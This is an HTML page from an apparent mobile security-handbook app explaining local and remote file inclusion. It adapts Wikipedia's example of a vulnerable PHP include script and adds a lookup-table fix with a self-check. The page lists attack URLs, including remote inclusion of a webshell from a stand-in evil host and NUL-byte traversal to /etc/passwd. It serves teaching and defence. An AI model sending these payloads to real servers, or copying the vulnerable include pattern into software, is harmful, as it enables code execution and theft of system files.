/assets/www/lrfi.html
HTML | 186 lines | 185 code | 1 blank | 0 comment | 0 complexity | 9aaec724ffe546ebc0af2b911cf7e4a9 MD5
- <!DOCTYPE html>
- <html>
- <head>
- <meta charset="utf-8" />
- <meta name="viewport" content="width=device-width, initial-scale=1" />
- <title>
- </title>
- <link rel="stylesheet" href="jquery.mobile-1.1.0.min.css" />
- <style>
- /* App custom styles */
- </style>
- <script src="jquery-1.7.2.min.js">
- </script>
- <script src="jquery.mobile-1.1.0.min.js">
- </script>
-
- <div data-role="page" id="page33">
- <div data-theme="a" data-role="header">
- </div>
- <div data-theme="a" data-role="header" data-position="fixed">
- <h1>
- InfoSec Handbook
- </h1>
- <div data-role="navbar" data-iconpos="left">
- <ul>
- </ul>
- </div>
- </div>
- <div data-role="content">
- <div>
- <h2>
- Local/Remote File Include
- </h2>
- <h3>
- Local/Remote File Include
- </h3>
- <h4>
- Taken from
- <a href="https://en.wikipedia.org/wiki/Local_File_Inclusion">
- wikipedia.org/lfi
- </a>
- <br />
- <br />
- Remote File Inclusion (RFI) is a type of vulnerability most often found
- on websites. It allows an attacker to include a remote file, usually through
- a script on the web server. The vulnerability occurs due to the use of
- user-supplied input without proper validation. The impact can be as minimal
- as outputting the contents of the file, but depending on the severity it
- can also lead to, to list a few:
- <br />
- <br />
- Code execution on the web server
- <br />
- Code execution on the client side, such as JavaScript, which can lead to
- other attacks such as cross-site scripting (XSS).
- <br />
- Denial of Service (DoS)
- <br />
- Data Theft/Manipulation
- <br />
- <br />
- </h4>
- <h3>
- Example:
- </h3>
- <h4>
- Consider this PHP script (which includes a file specified by request):
- <br />
- <br />
- &lt;?php
- <br />
- $color = 'blue';
- <br />
- if (isset( $_GET['COLOR'] ) )
- <br />
- $color = $_GET['COLOR'];
- <br />
- include( $color . '.php' );
- <br />
- ?&gt;
- <br />
- <br />
- <br />
- &lt;form method="get"&gt;
- <br />
- &lt;select name="COLOR"&gt;
- <br />
- &lt;option value="red"&gt;red&lt;/option&gt;
- <br />
- &lt;option value="blue"&gt;blue&lt;/option&gt;
- <br />
- &lt;/select&gt;
- <br />
- &lt;input type="submit"&gt;
- <br />
- &lt;/form&gt;
- <br />
- <br />
- The developer intended only blue.php and red.php to be used as options.
- But as anyone can easily insert arbitrary values in COLOR, it is possible
- to inject code from files:
- <br />
- <br />
- /vulnerable.php?COLOR=http://evil.example.com/webshell.txt?
- <br />
- Injects a remotely hosted file containing malicious code.
- <br />
- <br />
- /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit
- <br />
- Executes code from an already uploaded file called exploit.php (local
- file inclusion vulnerability)
- <br />
- <br />
- /vulnerable.php?COLOR=C:\\notes.txt%00
- <br />
- Uses the NUL metacharacter to cut off the .php suffix, allowing access
- to files other than .php. (Enabling magic_quotes_gpc limits the attack
- by escaping special characters, which disables the use of the NUL
- terminator.)
- <br />
- <br />
- /vulnerable.php?COLOR=/etc/passwd%00
- <br />
- Allows an attacker to read the contents of the passwd file on a UNIX system
- through directory traversal.
- </h4>
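- <h4>
- Added example, not part of the original page or the Wikipedia text: one way
- to close the hole in the script above is to use COLOR only as a key into a
- fixed table, so the request value never becomes part of the include path.
- The COLOR_FILES table, the resolve_color() helper, the file layout and the
- command-line self-check over the request values quoted above are assumptions
- made for illustration.
- </h4>

```php
<?php
declare(strict_types=1);

// Added example, not the page's code. File names and layout are assumed:
// red.php and blue.php sit in the same directory as this script.
const COLOR_FILES = ['red' => 'red.php', 'blue' => 'blue.php'];

/**
 * Return the file to include for a COLOR value, or null to reject.
 * The request value is only ever used as a lookup key; the path that
 * reaches include comes from COLOR_FILES, never from the request.
 */
function resolve_color($raw): ?string
{
    if ($raw === null) {
        return COLOR_FILES['blue'];          // same default as the original
    }
    // COLOR[]=x arrives as an array; anything but an exact key is rejected.
    if (!is_string($raw) || !array_key_exists($raw, COLOR_FILES)) {
        return null;
    }
    return COLOR_FILES[$raw];
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: the COLOR values quoted above, URL-decoded,
    // plus an array-valued parameter.
    $samples = [
        null, 'red',
        'http://evil.example.com/webshell.txt?',
        'C:\\ftp\\upload\\exploit',
        "C:\\notes.txt\0",
        "/etc/passwd\0",
        ['red'],
    ];
    foreach ($samples as $s) {
        $shown = json_encode($s, JSON_UNESCAPED_SLASHES);
        printf("%-42s => %s\n", $shown, resolve_color($s) ?? 'rejected');
    }
    exit(0);
}

$file = resolve_color($_GET['COLOR'] ?? null);
if ($file === null) {
    http_response_code(400);                 // fail closed, include nothing
    exit('Unknown color');
}
include __DIR__ . '/' . $file;
```

- <h4>
- Keeping allow_url_include disabled in php.ini (its default) blocks the
- remote case as defense in depth, but it does nothing for the local-file
- cases, which is why the lookup table is the actual fix.
- </h4>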
- <h3>
- Links
- </h3>
- <h4>
- <li>
- <a href="http://pastie.org/840199">
- http://pastie.org/840199
- </a>
- </li>
- <li>
- <a href="http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/">
- Exploiting PHP File Inclusion – Overview « Reiners’ Weblog
- </a>
- </li>
- <li>
- <a href="http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter">
- LFI..Code Exec..Remote Root!
- </a>
- </li>
- <li>
- <a href="http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/">
- Local File Inclusion – Tricks of the Trade « Neohapsis Labs
- </a>
- </li>
- <li>
- <span>
- <a href="http://www.digininja.org/blog/when_all_you_can_do_is_read.php">
- Blog, When All You Can Do Is Read - DigiNinja
- </a>
- </span>
- </li>
- </h4>
- <br />
- </div>
- <a data-role="button" data-inline="true" data-rel="back" data-transition="fade" data-theme="a" href="#page1" data-icon="home" data-iconpos="left">
- Back
- </a>
- </div>
- <div data-theme="a" data-role="footer" data-position="fixed">
- <h3>
- <a href="https://play.google.com/store/apps/details?id=my.first.app">Rate This App!</a>
- </h3>
- </div>
- </div>
-
-
- <link rel="stylesheet" href="master.css" type="text/css" media="screen" title="no title">
- <script type="text/javascript" charset="utf-8" src="phonegap-1.4.0.js"></script>
- <script type="text/javascript" charset="utf-8" src="main.js"></script>
- </head>
- <body>
-
-
- </body>
- </html>